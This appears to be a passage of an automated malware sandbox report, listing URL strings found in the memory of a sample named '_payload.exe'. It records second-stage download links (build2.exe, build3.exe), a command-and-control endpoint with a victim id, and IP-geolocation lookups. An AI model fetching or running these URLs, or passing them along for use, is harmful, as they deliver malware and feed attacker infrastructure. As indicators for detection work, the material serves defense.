                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.0000000001389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/build2.exe$run
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/build2.exerun00.Y
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1934779392.0000000004120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1934984061.0000000004120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935045851.0000000004120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935112454.0000000004120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeString found in binary or memory: http://www.openssl.org/support/faq.html
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935177752.0000000004120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935241959.0000000004120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935312916.0000000004120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935388771.0000000004120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332095070.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.000000000136B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.0000000001388000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$run
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.000000000136B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exerun8
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.0000000001388000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330817577.0000000001328000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637V
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637i
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.phpP
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.phpep
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.0000000001388000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.000000000140D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.000000000140F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.00000000008E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/:
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/=
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/P
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.00000000008E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/d
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeString found in binary or memory: https://api.2ip.ua/geo.json
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001166000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json%
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json)
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json/
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.00000000010D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json:
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonM
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonO
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.0000000001446000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonOC
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.00000000010D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonU
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsong
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.0000000001446000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsongC
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.00000000010D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonsS
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.000000000140D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.000000000140F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/o
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.b?
                Source: 30264859306.ttf.2.dr, 37262344671.ttf.2.drString found in binary or memory: https://github.com/andre-fuchs/kerning-pairs/blob/master/LICENSE.md).
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315130907.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327644820.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270669928.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332149478.0000000003C50000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-tnzomMj6
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332095070.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315130907.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327644820.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270669928.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332149478.0000000003C50000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-tnzomMj6HU
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315130907.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327644820.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270669928.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332149478.0000000003C50000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 